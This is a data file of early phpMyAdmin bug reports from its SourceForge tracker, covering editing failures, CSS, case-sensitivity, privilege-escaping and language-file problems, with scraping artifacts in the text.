"24444","6732","row snot modifiable.
I have a table at least) where I cannot access the contant of some rows but not all.
When I click amp;quot;modify amp;quot; nothing occurs and two rows beneath it works.
Original URL https sourceforge.net p phpmyadmin bugs 363 https sourceforge.net p phpmyadmin bugs 363 Original author anonymous Found in version 2.2.2","bug"
"24444","6733","Edit after Select not working with IE6.
PHP 2.2.5 Open MySQL database.
Do a Select.
Click Edit on any of the resulting rows.
Nothing happens.
Works fine with Opera 6 and NS 6, but does not work with IE6 I ve tried this on different PCs with same result.
If you right click on amp;quot;Edit amp;quot; and amp;quot;Open in New Window amp;quot; it works, but after editing a SQL error is generated but the edit works).
Original URL https sourceforge.net p phpmyadmin bugs 364 https sourceforge.net p phpmyadmin bugs 364 Original author anonymous","bug"
"24444","6734","Bad CSS Styles for textarea have chosen.
Bad CSS Styles for text area, text, buttons have been chosen.
If I use black color as the default color for all windows then I see black text at black background because you set foreground color for those controls to black in CSS) but NOT set background color to andother color in CSS).
Original URL https sourceforge.net p phpmyadmin bugs 365 https sourceforge.net p phpmyadmin bugs 365 Original author anonymous Found in version 2.2.4","bug"
"24444","6735","Interface.
middle alignment 4 browse .
Hi, brows ing a table When a row has a cell value larger than its amp;lt;td amp;gt; the text in the cell wraps.
That s tottally fine.
The only thing I think is to be changed is vertical alignment of the whole row.
Just change amp;lt;tr amp;gt; align to middle instead of top FOR HORIZONTAL VIEW ONLY) so the non wrapping cells will look prettier.
This is simply an estetic inconsistancy and might be relevant now that you ve done such a great on the interface.
Maxim Maletsky, maxim maxim.cx Original URL https sourceforge.net p phpmyadmin bugs 366 https sourceforge.net p phpmyadmin bugs 366 Original author s maxim Found in version 2.2.5 rc1","bug"
"24444","6736","CSS for input fields.
Hi, after fixing bug 539756, all input fields is realy ugly on Windows XP is not like all others new style in WinXP) insteed adding background color in CSS, maybe is better to remove color, and browser will take default.
========== Igor Original URL https sourceforge.net p phpmyadmin bugs 367 https sourceforge.net p phpmyadmin bugs 367 Original author mligor","bug"
"24444","6737","2.2.5) can t select and change.
Hi, if I select one row with this amp;quot;tbl select.php?
lang=en amp;amp;server=1 amp;amp;db=abc amp;amp;table=user amp;amp;goto=tbl properties.
php amp;quot; it is has no effect, if I click on the edit Button.
The row is highlighted, but nothing happens.
This isn t possible since 2.2.5.
Greets rollmotz Original URL https sourceforge.net p phpmyadmin bugs 368 https sourceforge.net p phpmyadmin bugs 368 Original author anonymous Found in version 2.2.5","bug"
"24444","6738","MySQL 4.01 on WinNT, Upper Case problem.
I am not sure..
I have no way of telling.. if this is a problem with MySQL or with phpmyadmin.
I figured I would submit the bug here so you could figure it out.
Anyways...
Welcome to phpMyAdmin 2.2.6 rc1 MySQL 4.0.1 alpha nt running on localhost as root localhost This problem also occurs on phpmyadmin 2.2.5) First thing I noticed is that when I create a table, it changes its name to all lower case.
Not something that would jeopardize my life, but it s nice to have the ability to use different cases when labeling things.
Secondly, relating to the Case problem, when I create a database with any Upper case letters in it, and I create a table in the DB.. when I try inserting a record, it acts like it was successful, but it still shows 0 Records in phpmyadmin.
However, the insertion was in fact successful because if I use a SELECT command, it finds them.
I just don t understand why phpmyadmin would not see those records?
Sometimes, if I create a few more db s and drop them.. phpmyadmin will amp;quot;refresh amp;quot; and all of the sudden see the records.
It s very strange.
Also, if I try dropping the table or database... users being the name is not the problem.. this has happened with many other words too) SQL query DROP TABLE `users` MySQL said Error on delete of .\teach\users.MYI Errcode 13) It may not have anything to do with this error, but Users did start off with a capital U. I don t know if that would possibly be connected with the Case problem.
If you find this is not a problem with phpmyadmin seeing as how I am using the alpha version of MySQL 4) please let me know.
Keep me updated! )
Thanks, acidrain64 satx.rr.com Kyle Otto Original URL https sourceforge.net p phpmyadmin bugs 369 https sourceforge.net p phpmyadmin bugs 369 Original author anonymous Found in version 2.2.6","bug"
"24444","6739","[CVS latest] Bugs with varchar fields.
I m running the latest CVS version of PMA with MySQL 3.23.49.
I don t know if this is a bug or a feature, but I m not able to create amp;quot;varchar amp;quot; fields.
They always show up as amp;quot;chars amp;quot;.
Visa Original URL https sourceforge.net p phpmyadmin bugs 371 https sourceforge.net p phpmyadmin bugs 371 Original author anonymous","bug"
"24444","6740","2.2.6 rc1) XHTML CSS compilance.
In the new version of Documentation.html you wrote that the complete code was now XHTML 1.0 CSS 2.0 compilant.
But... in the left frame, the amp;lt;nobr amp;gt; tag has been used several times and this tag is not part of the HTML 1.0 recommendation, afaics...
The next thig ist this problem with the background colors of amp;lt;textarea amp;gt;, amp;lt;input amp;gt; and amp;lt;select amp;gt; fields.
As I noticed, you removed the background color elements from your CSS.
This element is not necessary, but the W3C recommends to define a background color to each foreground color.
And the forground color for these fields are set to black.
And this could cause trouble.
For instance, someone has set up his OS colors so that input boxes have white text on a black background by default.
phpMyAdmin s CSS would override the text color setting but not the background color setting.
The result of that would be?
Black text on a black background.
Please check these two issues, Rabus Original URL https sourceforge.net p phpmyadmin bugs 370 https sourceforge.net p phpmyadmin bugs 370 Original author rabus Found in version 2.2.6 rc1","bug"
"24444","6741","Maxlength can t be less than 4.
Also, I have a table with a varchar 3) field.
However, when adding a row, the maxlength of the field in the form is 4.
Looking at tbl change.php3, it says amp;quot;if len amp;lt; 4) \{ fieldsize = maxlength = 4; [...] amp;quot; So that even if the length of a varchar is less than 4, the maxlength is still 4.
Maybe there s a reason for this, but I consider this a bug.
Visa Original URL https sourceforge.net p phpmyadmin bugs 372 https sourceforge.net p phpmyadmin bugs 372 Original author anonymous","bug"
"24444","6742","2.2.6 rc1) relations to charfield with blanks.
I have a table where the primary key unfortunately is a char 10) field that can have blanks in it projectnumber e.g.
= 599 28 A ).
if i browse a table that is related to this table and want to use the relation to get to the table then it does not work because the select statement that is made has field = 599 amp;amp;nbsp;28 amp;amp;nbsp;A .
obviously you parse the text found in charfields to replace blanks with amp;amp;nbsp; to make sure they show well on the screen, but then you should use the original fieldvalue to make the select statement.
unfortunately i could not find where you replace.
Original URL https sourceforge.net p phpmyadmin bugs 373 https sourceforge.net p phpmyadmin bugs 373 Original author mikebeck Found in version 2.2.6 rc1","bug"
"24444","6743","2.2.6 rc1) Priv.
problems with character in db names.
Basically, it s like this.. if you have given permissions to someone like so grant all privileges on test\ db .
to user localhost; phpMyAdmin misinterprets the underscore character as a wildcard, when because it is escaped, it means a literal underscore in the database name.
This patch seems to work nicely and just replaces a few lines in main.php3.
So if someone has access to just test\ db and test db exists, then they will not get a create database prompt.
It also performs checks so even an access grant like test\ db will work allowing the user to create test db1, test db2, etc).
Original URL https sourceforge.net p phpmyadmin bugs 374 https sourceforge.net p phpmyadmin bugs 374 Original author meheler Found in version 2.2.6 rc1","bug"
"24444","6744","2.2.5) Url not found when showing records.
With a table with more than 30 records showing the first 30 records there s no problem, but when you try to reach the next page to see the other records i see this error amp;quot;the requested utl was not found amp;quot;.
Anyone had seen this error?
Original URL https sourceforge.net p phpmyadmin bugs 375 https sourceforge.net p phpmyadmin bugs 375 Original author anonymous Found in version 2.2.5","bug"
"24444","6745","2.2.6 rc1) Wrong interval is displayed.
I got a bug report via E Mail Hi On the amp;quot;Browser amp;quot; Page of a Table it reads for eg Show 10 Entries) amp;quot;Showing rows 0 10 12 total) amp;quot; But it should be amp;quot;0 9 amp;quot; because 0 10 is 11 Entries.
only cosmetic, the actual show table is correct) Matthias Schniedermeyer I reproduced this bug with the current CVS.
I ll make a fix for it soon.
Rabus Original URL https sourceforge.net p phpmyadmin bugs 376 https sourceforge.net p phpmyadmin bugs 376 Original author rabus Found in version 2.2.6 rc1","bug"
"24444","6746","Dump error on line 74.
Steps 1\.
I select properties of a table name is amp;quot;messages amp;quot;) On a database name is amp;quot;bopasbo.com amp;quot;, same as the domaine name and runing on amp;quot;sql.bopasbo.com amp;quot;) ; 2\.
I want View dump schema) of table.
I select amp;quot;Structure and data amp;quot; and Go button.
I can see this error Warning Supplied argument is not a valid MySQL result resource in build dump.lib.php on line 74 phpmyadmin MySQL Dump version 2.2.5 http phpwizard.net phpmyadmin http phpmyadmin.sourceforge.net download page) Host sql.bopasbo.com Generation Time Apr 12, 2002 at 03 21 PM Server version 3.23.39 PHP Version 4.0.6 Database `bopasbo.com` Table structure for table `messages` ; Dumping data for table `messages` Error SQL query SELECT FROM `bopasbo.com`.`messages` MySQL said Incorrect table name messages Original URL https sourceforge.net p phpmyadmin bugs 377 https sourceforge.net p phpmyadmin bugs 377 Original author sgarin Found in version 2.2.5","bug"
"24444","6747","2.2.5) Field name with localized char can t change prop.. You have a fieldname that contains umlaute and you want to change fieldname and fieldtype.
If you want to change multiple fields and select them with the checkboxes and then click on amp;quot;Change amp;quot; below the list, it doesn t work.
Original URL https sourceforge.net p phpmyadmin bugs 379 https sourceforge.net p phpmyadmin bugs 379 Original author anonymous Found in version 2.2.6 rc1","bug"
"24444","6748","Undef variable pma uri parts[ scheme ].
In main.php, line 14, the variable is https is defined against pma uri parts[ scheme ] but this one is undefined.
I ve found no trace of this variable within the other source files.
Moreover, the line is within a block if !isset pma uri parts)) ; ) Original URL https sourceforge.net p phpmyadmin bugs 380 https sourceforge.net p phpmyadmin bugs 380 Original author anonymous Found in version 2.2.6 rc2","bug"
"24444","6749","dump still contains old URI.
If you create a dump, it still contains the following lines phpMyAdmin MySQL Dump version 2.2.6 rc2 http phpwizard.net phpMyAdmin http phpmyadmin.sourceforge.net download page) ...
Shouldn t this point to amp;lt;http www.phpmyadmin.net amp;gt; ?
imho we should change that before 2.2.6 Original URL https sourceforge.net p phpmyadmin bugs 378 https sourceforge.net p phpmyadmin bugs 378 Original author rabus","bug"
"24444","6750","wrong databasenames in table mysql.db.
When I create an new user who has only priviliges to one database, the name of the database in the table mysql.db is not like the one specified by me.
Example original database amp;quot;db test azubi amp;quot; and the name i found in the mysql.db is amp;quot;d\ tes\ azubi amp;quot;.
mysql, apache and php are running under WinNT4.0 Original URL https sourceforge.net p phpmyadmin bugs 381 https sourceforge.net p phpmyadmin bugs 381 Original author anonymous Found in version 2.2.6 rc2","bug"
"24444","6751","User Permissions Granularity.
There needs to be a greater degree of granularity for assigning user permissions.
Right now, you are only able to set permissions for the mysql.users table from the amp;quot;Users amp;quot; page.
It would be nice to have some way of selecting a particular database, table, column, etc.
without having to do this manually i.e.
running GRANT [I know, I know I m lazy], or editing the mysql.
tables via the interface).
Original URL https sourceforge.net p phpmyadmin bugs 382 https sourceforge.net p phpmyadmin bugs 382 Original author anonymous Found in version 2.2.5","bug"
"24444","6752","Wrong default Cyrillic encoding for BG.
Since, maybe 2.2.3 version, phpMyAdmin supports both KOI8 R and WINDOWS 1251 for bulgarian language.
Since WINDOWS 1251 is far more popular for development, using the default KOI8 R for entering info s in the database, can cause a lot of headache on any user, who, doesn t care about encoding combo.
I had to change the select lang.lib.php for every new version, so operators want make mistakes.
I recommend default encoding for BG language to be WINDOWS 1251 one row up in select lang.lib.php) Thanks Stefan Tsonev Original URL https sourceforge.net p phpmyadmin bugs 383 https sourceforge.net p phpmyadmin bugs 383 Original author anonymous Found in version 2.2.3","bug"
"24444","6753","2.2.6) Navigation tooltips.
Just a small thing The table list in the left frame contains mouseover tooltips like amp;quot;table comment x Rows) amp;quot;.
When inserting new records the left frame is not being refreshed so a wrong amp;quot;Rows amp;quot; value is displayed until the user changes the database or refreshes the left frame manually.
Original URL https sourceforge.net p phpmyadmin bugs 384 https sourceforge.net p phpmyadmin bugs 384 Original author rabus Found in version 2.2.6","bug"
"24444","6754","2.2.6 final on another port.
When using phpMyAdmin 2.2.6 final on another port than 80 i.e.
88, my apache2 which is running parallel) phpMyAdmin doesn t working.
I ve cfgPmaAbsoluteUri = http 192.168.0.4 88 phpmyadmin ; set, but it hasn t any effects.
Original URL https sourceforge.net p phpmyadmin bugs 385 https sourceforge.net p phpmyadmin bugs 385 Original author daskaja Found in version 2.2.6 rc2","bug"
"24444","6755","2.2.6) Typo error in Russian koi8.
PHP Parse error parse error in usr local phpMyAdmin 2.2.6 lang russian koi8.inc.php on line 232 strPmaUriError = xd0x94xd0xb8xd1x80xd0xb5xd0xbaxd1x82xd0xb8xd0xb2xd0xb0 amp;lt;tt amp;gt; cfgPmaAbsoluteUri amp;lt; tt amp;gt; xd0xb4xd0xbexd0xbbxd0xb6xd0xbdxd0xb0 xd0xb1xd1x8bxd1x82xd1x8c xd1x83xd1x81xd1x82xd0xb0xd0xbdxd0xbexd0xb2xd0xbbxd0xb5xd0xbdxd0xb0 xd0xb2 xd0x92xd0xb0xd1x88xd0xb5xd0xbc xd0xbaxd0xbexd0xbdxd1x84xd0xb8xd0xb3xd1x83xd1x80xd0xb0xd1x86xd0xb8xd0xbexd0xbdxd0xbdxd0xbexd0xbc xd1x84xd0xb0xd0xb9xd0xbbxd0xb5!
; Quote is placed in wrong position after amp;lt;tt amp;gt;; Original URL https sourceforge.net p phpmyadmin bugs 386 https sourceforge.net p phpmyadmin bugs 386 Original author anonymous Found in version 2.2.6","bug"
"24444","6756","2.2.6) JS error with mozilla.
Hi, The second bug which was mentioned as follow up to bug 536623 still occurs when using mozilla web browser If a whitespace is typed in the SQL Query edit area, the page scrolls down.
So most times you cannot type a SQL query with Mozilla 0.9.9).
With NS 4.78 or Konqueror there is no problem.
Original URL https sourceforge.net p phpmyadmin bugs 387 https sourceforge.net p phpmyadmin bugs 387 Original author rateoty Found in version 2.2.6","bug"
"24444","6757","phpmyadmin.net s web page no workie.
It is impossible to download your software from www.phpadmin.net using wget or links.
Some error page is downloaded instead.
Original URL https sourceforge.net p phpmyadmin bugs 388 https sourceforge.net p phpmyadmin bugs 388 Original author dmr","bug"
"24444","6758","Check the bz amp; zlib module.
I think u d better check if the bz2 module been loaded.
When dump SQL file from the database or table) with bzip format, PMA system will generate a bad bzip archive if bz2 module php bz2.dll) is t loaded.
Original URL https sourceforge.net p phpmyadmin bugs 389 https sourceforge.net p phpmyadmin bugs 389 Original author anonymous","bug"
"24444","6759","2.2.6) Marker Color can t equal Pointer Color.
If cfgBrowseMarkerColor is equal to cfgBrowsePointerColor, then the marking feature doesn t work any more.
For example cfgBrowsePointerColor = FF0000 ; cfgBrowseMarkerColor = FF0000 ; The marking feature will not work.
However, cfgBrowsePointerColor = FF0000 ; cfgBrowseMarkerColor = FF0001 ; The marking feature will work.
Original URL https sourceforge.net p phpmyadmin bugs 390 https sourceforge.net p phpmyadmin bugs 390 Original author anonymous Found in version 2.2.6","bug"
"24444","6760","2.3.2) Mac non ASCII 128 chraracters are displayed wrong.
hello!
i am running phpmyadmin 2.2.6. on a macintosh and i have to correct the vowels in the file german.inc.php because their are not in prober html.
probably other languages have the same problem if there is an amp;quot;xc3xa4 amp;quot; it appears as an or something else.
it would be great to publish next versions with correct html vowels like amp;amp;auml; i attached the corrected german.inc.php.
thank you for your great work!
rainer Original URL https sourceforge.net p phpmyadmin bugs 391 https sourceforge.net p phpmyadmin bugs 391 Original author anonymous Found in version 2.3.2","bug"
"24444","6761","2.2.6) mysql error when dropping fields.
phpMyAdmin version 2.2.6 mySQL version 2.23.41 PHP version 4.0.6 Apache version 1.3.20 When I drop a field from a table, the field gets dropped, but I get a bunch of PHP errors Warning Supplied argument is not a valid MySQL result resource in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php on line 572 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \libraries\common.lib.php 572) in e \program files\apache group\apache\htdocs\phpmyadmin 2.2.6 \header.inc.php on line 29 I haven t modified any of the phpMyAdmin files, so I don t think that s the reason for the amp;quot;cannot add header information amp;quot; errors.
Original URL https sourceforge.net p phpmyadmin bugs 392 https sourceforge.net p phpmyadmin bugs 392 Original author anonymous Found in version 2.2.6","bug"
"24444","6762","SQL display warning.
Hi all, When I try to execute SQL statment like SELECT city,count ) FROM `stat` group by city ORDER BY `count )` ASC phpMyAdmin return a warning Warning REG BADRPT 8repetition operator operand invalid in c \apache\htdocs\phpmyadmin\libraries\display tbl.lib.p hp3 on line 551 This warinng disappear when amp;quot;sort by amp;quot; are missing.
Attached file contain SQL table structure and some records.
Original URL https sourceforge.net p phpmyadmin bugs 393 https sourceforge.net p phpmyadmin bugs 393 Original author darcoto Found in version 2.2.6 rc2","bug"
"24444","6763","no edit links.
Edit works ok if I browse a big table, but after I select a group of records, the edit and insert links won t do anything sometimes they are empty).
This happens only after select.
Sometimes I can open the edit links in a new window.
When I klick on OK now I get an error in the SQL Syntax like amp;quot;SELECT `transaction id`,`ticket no`,`gifs dealer id`, 2 amp;quot; Other tables in this database work fine.
It was working with 2.2.6 and Apache 3.20 on NT4 Server.
Client NT4 with IE 5 6.
The table has 63 fields.
Original URL https sourceforge.net p phpmyadmin bugs 394 https sourceforge.net p phpmyadmin bugs 394 Original author j0erch","bug"
"24444","6764","index filename in 2.2.6 amp; left nav.
Hi, I like to change the index.php filename to something a bit different amp;gt; MysqlPhpAdminIndexFoo.php I then change permissions on the directory to 111, I then connect over SSL using http authentication.
So we are nice and secure, I then bookmark this for myself.
Now with 2.2.6 if I change the index.php to a different filename, the left drop down navigation doesn t work.
It can t find the page you ask for.
Maybe the drop down s action is being defaulted at the cfgPmaAbsoluteUri ???
Original URL https sourceforge.net p phpmyadmin bugs 395 https sourceforge.net p phpmyadmin bugs 395 Original author anonymous Found in version 2.2.6","bug"
"24444","6765","2.2.6) Alter table not replicate.
When I add fields to table phpmyadmin use code like ALTER TABLE `NWlocal`.`Areas` ADD `qwe` VARCHAR 3) NOT NULL; this code not replicated.
Mysql replicate queries, which use replicateble db.
please fix code for not use dbname.
Original URL https sourceforge.net p phpmyadmin bugs 396 https sourceforge.net p phpmyadmin bugs 396 Original author avryabov Found in version 2.2.6","bug"
"24444","6766","2.2.6) Strange error if controluser is invalid.
If the MySQL server refuses the controluser login I get a huge set of amp;quot;Undefined variable amp;quot; errors followed by header errors.
The whole mess starts with Notice Undefined variable cfgOBGzip in [PMA dir] \header.inc.php3 on line 10 with v2.2.7 dev or Notice Undefined variable cfg in [PMA dir] \header.inc.php3 on line 10 with 2.3.0 dev I m currently looking for the piece of code that causes all the trouble but I haven t succeeded yet...
Original URL https sourceforge.net p phpmyadmin bugs 397 https sourceforge.net p phpmyadmin bugs 397 Original author rabus","bug"
"24444","6767","2.2.6) Db name with amp;quot;\ amp;quot; changed when granting.
In username Grants Add new priviledges 1\.
Database longviewtech clan from pulldown list) 2\.
Priviledges selected 3\.
Click OK Listed of database priviledges for users Database name become longviewtec\ clan in the list of database with priviledges for user.
The h is replaced by a \ Original URL https sourceforge.net p phpmyadmin bugs 398 https sourceforge.net p phpmyadmin bugs 398 Original author anonymous Found in version 2.2.6","bug"
"24444","6768","2.2.6) Cookie auth and cookies refused.
Running the amp;quot;cookie amp;quot; authentication mode with an end user rejecting cookies leads to multiple login imbricated frames.
I ll fix it within a few minuts in the CVS tree.
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 400 https sourceforge.net p phpmyadmin bugs 400 Original author loic1 Found in version 2.2.6","bug"
"24444","6769","2.2.6) pma ignores case of table names.
I have several tables with uppercase letters in their names but the dump database feature ignores these letters when it creates the create database statement.
Following file is created Tabellenstruktur fxc3xbcr Tabelle `statsImpressions` DROP TABLE IF EXISTS `statsImpressions`; CREATE TABLE `statsimpressions` ` ID` int 10) unsigned NOT NULL auto increment, ` SiteID` int 10) unsigned NOT NULL default 0 , ` Date` datetime NOT NULL default 0000 00 00 00 00 00 , ` IP` int 10) unsigned NOT NULL default 0 , PRIMARY KEY ` ID`) ) TYPE=MyISAM; Notice the right table name in the comment and drop table statement but the wrong one in the create table statement.
Original URL https sourceforge.net p phpmyadmin bugs 399 https sourceforge.net p phpmyadmin bugs 399 Original author ci dev Found in version 2.2.6","bug"
"24444","6770","Upload SQL textfile.
Hi, I have problem with function upload SQL textfile, when try upload something, it fails and show white page.
It s bug or some mistake by me?
Thanx a lot Jan PAVLIK Original URL https sourceforge.net p phpmyadmin bugs 401 https sourceforge.net p phpmyadmin bugs 401 Original author anonymous","bug"
"24444","6771","2.2.6) row count starts at 1?.
If I try to export data with tbl properties export.php3 it appears to me as if the row count starts at 1 and not at 0 as it should...
Original URL https sourceforge.net p phpmyadmin bugs 402 https sourceforge.net p phpmyadmin bugs 402 Original author rabus Found in version 2.2.6","bug"
"24444","6772","2.3.0) Change description of a table.
Hello, here s a small bug If you want to change the description comment of a table and press Enter after changing the text, it doesn t work.
It works only, if you press the Go Button.
Have a nice day, Mark Original URL https sourceforge.net p phpmyadmin bugs 404 https sourceforge.net p phpmyadmin bugs 404 Original author markme Found in version 2.2.6","bug"
"24444","6773","Edit problem after select.
Hi !
PHPMyAdmin version 2.2.6 IE version 5.50.4807.2300 I tried this Open a database by selecting it in the list Click on a table Click on Select, fill one field and submit The corresponding record is displayed Then click on Edit, and then nothing The only way to Edit is to open a new window with the context menu.
After editing and submitting, an SQL error is displayed, seems like the SQL generated use LIK instead of LIKE .
Original URL https sourceforge.net p phpmyadmin bugs 403 https sourceforge.net p phpmyadmin bugs 403 Original author anonymous Found in version 2.2.6","bug"
"24444","6774","malformed urls.
Links in the main window have malformed urls that have the port number referenced twice https fqdn 443 443 MyAdmin ...
Causing some browsers to return a host not found error primarily Microsoft Internet Explorer for Mac OS X).
Original URL https sourceforge.net p phpmyadmin bugs 405 https sourceforge.net p phpmyadmin bugs 405 Original author anonymous Found in version 2.2.4","bug"
"24444","6775","2.2.6) hungarian file extra blank lines.
If you choose Hungarian language, the program produces a lot of Couldn t send headers... error.
It is caused by the lang hungarian.inc.php , which has two CRLFs after ?
amp;gt; .
So please correct this file in the distrib.
Original URL https sourceforge.net p phpmyadmin bugs 407 https sourceforge.net p phpmyadmin bugs 407 Original author anonymous Found in version 2.2.6","bug"
"24444","6776","Edit impossible.
DROP TABLE IF EXISTS `site menu`; CREATE TABLE `site menu` `ID` int 3) NOT NULL auto increment, `data` mediumtext, KEY `id` `ID`), FULLTEXT KEY `data` `data`) ) TYPE=MyISAM; I cannot edit the data ...!
There is HTML pages in it.
The Edit link just doesn t work.
Original URL https sourceforge.net p phpmyadmin bugs 406 https sourceforge.net p phpmyadmin bugs 406 Original author titeuf Found in version 2.2.6 rc2","bug"
"24444","6777","2.2.6) show bookmark error.
I have bookmarked a query but it became invalid due to a changed table name.
Now I tried to correct the name and choosed show only next to the bookmarked SQL query dropdown.
But the query didn t appear, I just always got the MySQL error message table does not exist which is correct but IMHO should not appear as the query should just be displayed and not executed.
Original URL https sourceforge.net p phpmyadmin bugs 408 https sourceforge.net p phpmyadmin bugs 408 Original author ci dev Found in version 2.2.6","bug"
"24444","6778","User privilidges grants wrong with .
When trying to grant access to a user with the database name set at amp;quot;intern employees amp;quot;, phpmyadmin misinterperets amp;quot;intern employees amp;quot; as amp;quot;inter\ employees amp;quot; and does not update the information properly into mysql.
This appears to be a formatting issue that has not properly been fixed as attempted in the last series of patches.
Action Database Table Privileges Grant Option Revoke Privileges inter\ employees All SELECT, INSERT, UPDATE, DELETE, CREATE, INDEX No mysql amp;gt; select from db; | Host | Db | User | Select priv | Insert priv | Update priv | Delete priv | Create priv | Drop priv | Grant priv | References priv | Index priv | Alter priv | | | test | | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | | | test\ | | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | | hydra.merch advant.com | inter\ employees | code access | Y | Y | Y | Y | Y | N | N | N | Y | N | 3 rows in set 0.00 sec) Original URL https sourceforge.net p phpmyadmin bugs 410 https sourceforge.net p phpmyadmin bugs 410 Original author anonymous Found in version 2.2.6","bug"
"24444","6779","2.2.6) max number of characters of int fields.
Hi, its not possible to fill an int 2) or greater field with a value of more than 4 characters.
I have modified the file tbl change.php to get the right size of the input textfield.
Roland v.Guerard Original URL https sourceforge.net p phpmyadmin bugs 409 https sourceforge.net p phpmyadmin bugs 409 Original author anonymous Found in version 2.2.6","bug"
"24444","6780","Error in russian koi8.inc.php.
Parse error parse error in var www html mysqladmin3 lang russian koi8.inc.php on line 232 Original URL https sourceforge.net p phpmyadmin bugs 411 https sourceforge.net p phpmyadmin bugs 411 Original author anonymous Found in version 2.2.6","bug"
"24444","6781","Query by Example does not generate Joins.
Using the query by example sample at http www.phpmyadmin.net documentation under the heading amp;quot;How can I use the relation table in Query by example?
amp;quot;, the Query builder DOES NOT create the joins.
I am using PHP 4.1.2, MySQL 3.23.49a Max, phpMyAdmin 2.2.6 with apache 1.3.22 on RedHat 7.1 Chaning the table fields to src table, src column, dest table, dest column does not work, though it DOES create the links when browsing a table individually.
In the documentation online and the Documentation.txt that comes in the pma distribution, there are a total of 3 different descriptions of the table structure for the relation table.
Original URL https sourceforge.net p phpmyadmin bugs 412 https sourceforge.net p phpmyadmin bugs 412 Original author anonymous Found in version 2.2.6","bug"
"24444","6782","2.2.6) in ldi table.php missing amp;lt;label amp;gt;.
In ldi table.php the amp;lt;label amp;gt; tags of the checkboxes are missing.
Original URL https sourceforge.net p phpmyadmin bugs 413 https sourceforge.net p phpmyadmin bugs 413 Original author anonymous Found in version 2.2.6","bug"
"24444","6783","introduction of integers in lt;INPUT gt;.
When you create a base with a sql file and there are integers in it, you have to put lines like this one id INTEGER 4) ...
SO WE LL SAY X=4 because INTEGER 4)) The file is executed normally.
Then when you want to insert a new data or update an older, the amp;lt;INPUT ... amp;gt; tag has MAXLENGTH of X.
But in MySQL, a INTEGER 4) goes from 0 to 256 4 or FROM 256 4) 2 to 256 4) 2) 1.
How can you put a so great number in a 4 cases amp;lt;INPUT amp;gt; tag.
The same thing happen when you update an INTEGER field only the X first ciphers of that number are shown and updated.
To have an optimal usage of MySQL, I don t find usefull to use 10 caracters to insert a value of 8 4.
Original URL https sourceforge.net p phpmyadmin bugs 414 https sourceforge.net p phpmyadmin bugs 414 Original author anonymous Found in version 2.2.6","bug"
"24444","6784","2.2.6) Remove pointless huge background image.
The 3849x6 pixel background image, bkg.gif, which does nothing except add a 1 pixel vertical black line to the left side of the right frame, causes most versions of Mozilla to scroll slowly and consume 100 cpu see http bugzilla.mozilla.org show bug.cgi?id=124150).
Can we get rid of it, since it surves no significant purpose anyways?
Original URL https sourceforge.net p phpmyadmin bugs 415 https sourceforge.net p phpmyadmin bugs 415 Original author chrisbolt Found in version 2.2.6","bug"
"24444","6785","2.2.6) Apache 2 and PHP 4.2 bug.
HTTP no refresh headers disdn t work well with such a configuration.
The fix is to change two lines near the top of amp;quot;left.php3 amp;quot; and amp;quot;header.inc.php3 amp;quot;, from header Cache Control no store, no cache, must revalidate ); HTTP 1.1 header Cache Control pre check=0, post check=0, max age=0 ); HTTP 1.1 to header Cache Control no store, no cache, must revalidate , pre check=0, post check=0, max age=0 ); HTTP 1.1 This is fixed in the CVS tree both HEAD and 2.2.7 branch).
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 416 https sourceforge.net p phpmyadmin bugs 416 Original author loic1 Found in version 2.2.6","bug"
"24444","6786","2.3.0 cvs) Apache 2, PHP 4.2.1, cookies.
phpMyAdmin 2.3.0 dev Looks like the setcookie ) at lines 375 and 381 of cookie.auth.lib.php3 don t work I enter my username and password, then the login panel comes back with no values for username and password.
Original URL https sourceforge.net p phpmyadmin bugs 417 https sourceforge.net p phpmyadmin bugs 417 Original author lem9 Found in version 2.2.6","bug"
"24444","6787","2.2.6) Javascript problem with Opera.
Using Opera, those Javascript security questions before deleting entries won t work.
Pressing amp;quot;Yes amp;quot; or amp;quot;No amp;quot;, the dialog closes and nothing happens afterwards.
A workaround is to open the link in a new window, then the old HTML based security question appears.
Tested with Opera 6.01 and 6.02 Build 1087 newest beta).
Server Apache 1.3.23, PHP 4.0.4 and MySQL 3.23.33 Original URL https sourceforge.net p phpmyadmin bugs 418 https sourceforge.net p phpmyadmin bugs 418 Original author anonymous Found in version 2.2.6","bug"
"24444","6788","Cannot edit table in IE only.
One particular table will not let us edit the data using Internet Explorer, but it will allow us to edit the data using Netscape.
In IE 5.5, clicking on amp;quot;edit amp;quot; when browsing does nothing.
This only occurs when this particular table reaches a certain number of rows.
The problem is not dependent on the data.
If the table structure is reproduced without data, and a single piece of new data is inserted in a single field, then editing is not possible.
By progressively removing rows from the table structure I determined that the problem is dependent on the total number of rows.
We did not have a problem with this table before upgrading to 2.2.6.
I have checked using different computers to make sure it is not a problem specific to a single browser installation.
In the table creation query below, the problem disappears if the last 5 rows are not included in the query, beginning with the row for ccbill customer lname.
The problem is not specific to the fields in these rows, because any row replacing them will cause the error.
